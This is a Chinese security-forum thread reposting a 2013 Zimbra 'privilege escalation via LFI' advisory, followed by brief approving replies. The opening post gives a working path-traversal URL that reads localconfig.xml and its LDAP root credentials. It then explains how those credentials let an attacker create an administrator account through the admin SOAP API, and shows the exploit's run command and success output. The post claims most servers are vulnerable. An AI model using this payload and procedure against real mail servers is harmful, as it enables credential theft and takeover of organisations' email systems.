查看: 15624|回复: 9

Zimbra – 0day exploit / Privilegie escalation via LFI

[复制链接]
  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2014-1-26 11:24:56 | 显示全部楼层 |阅读模式
    screen-shot-2013-12-07-at-102906-am1.png
    [AppleScript] 纯文本查看 复制代码
    # Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
    # Date: 06 Dec 2013
    # Exploit Author: rubina119
    # Contact Email : rubina119[at]gmail.com
    # Vendor Homepage: [url]http://www.zimbra.com/[/url]
    # Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
    # Tested on: Centos(x), Ubuntu.
    # CVE : No CVE, no patch just 0Day
    # State : Critical
     
    # Mirror: [url]http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip[/url]
     
    ---------------Description-----------------
     
    This script exploits a Local File Inclusion in
    /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
    which allows us to see localconfig.xml
    that contains LDAP root credentials wich allow us to make requests in
    /service/admin/soap API with the stolen LDAP credentials to create user
    with administration privlegies
    and gain acces to the Administration Console.
     
    LFI is located at :
    /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
     
    Example :
     
    [url]http://mail.example.com/res/I18nMsg[/url],AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
     
    or
     
    [url]http://mail.example.com:7071/zimbraAdmin/res/I18nMsg[/url],AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
     
    ----------------Exploit-----------------
     
    Before use this exploit, target server must have admin console port open
    "7071" otherwise it won't work.
     
    use the exploit like this :
     
    ruby run.rb -t mail.example.com -u someuser -p Test123_23
     
    [*] Looking if host is vuln....
    [+] Host is vuln exploiting...
    [+] Obtaining Domain Name
    [+] Creating Account
    [+] Elevating Privileges
    [+] Login Credentials
    [*] Login URL : [url]http://mail.example.com:7071/zimbraAdmin/[/url]
    [*] Account : [email]someuser@example.com[/email]
    [*] Password : Test123_23
    [+] Successfully Exploited !
     
    The number of servers vuln are huge like 80/100.
     
    This is only for educational purpouses.

    游客,如果您要查看本帖隐藏内容请回复

    评分

    参与人数 1i币 +4 收起 理由
    Diana + 4 的确是这样的。

    查看全部评分

    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-1-26 11:35:27 | 显示全部楼层
    我是沙发
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-9-21 14:45
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2014-1-26 11:54:11 | 显示全部楼层
    不错,看看。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-9-21 14:45
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2014-1-26 11:55:34 | 显示全部楼层
    LFI,直接爆出的password
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2015-11-13 15:35
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-1-26 12:04:29 | 显示全部楼层
    看看,研究一下
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-1-9 18:10
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-1-26 14:11:21 | 显示全部楼层
    就知道是这样滴~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-1-26 17:26:50 | 显示全部楼层
    赶紧看下
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-1-26 20:54:32 | 显示全部楼层
    不错,看看
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-1-27 07:36:59 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-7-31 10:41
  • 签到天数: 43 天

    [LV.5]常住居民I

    发表于 2014-1-27 11:27:11 | 显示全部楼层
    学习了,谢谢楼主分享
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-24 10:22 , Processed in 0.027769 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部